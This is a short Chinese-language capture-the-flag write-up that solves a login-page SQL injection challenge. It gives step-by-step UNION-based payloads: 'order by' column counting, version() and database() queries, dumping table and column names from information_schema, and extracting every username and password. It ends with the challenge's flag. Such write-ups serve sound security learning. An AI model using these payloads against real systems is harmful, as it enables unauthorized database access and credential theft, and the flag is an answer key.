题目打开是登录框,先尝试用万能密码
开始还以为这样就欧克了,但尝试之后发现这与flag无关。
所以还是从sql开始走一遍。
先查询一下字段
'order by 4#
字段数是四的时候报错了,后来小瑶尝试了在字段数为三时未报错。所以确定字段数是3.
之后用联合查询,看回显点位·在哪
很明显,返回值出现了2和3,说明回显点位是2和3
之后我们可以利用回显点位查询版本号和库名version(),database()(利用这两个函数)
'union select 1,version(),database()#
可以看到库名是geek,之后通过库名,我们可以爆一下表
’ union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()#
可以看到我们爆出了两个表,接下来可以尝试爆字段(可以一个一个表尝试,但答案是l0ve1ysq1这个表。我就直接爆它)
’ union select 1,2,group_concat(column_name) from information_schema.columns where table_schema=database() and table_name=‘l0ve1ysq1’#
我们得到了表中的记录(三个子段)
接下来,我们开始爆数据
’ union select 1,2,group_concat(id,username,password) from l0ve1ysq1#
得到flag
flag{d1211b74-c758-4c08-a542-ae38a8e37ac0}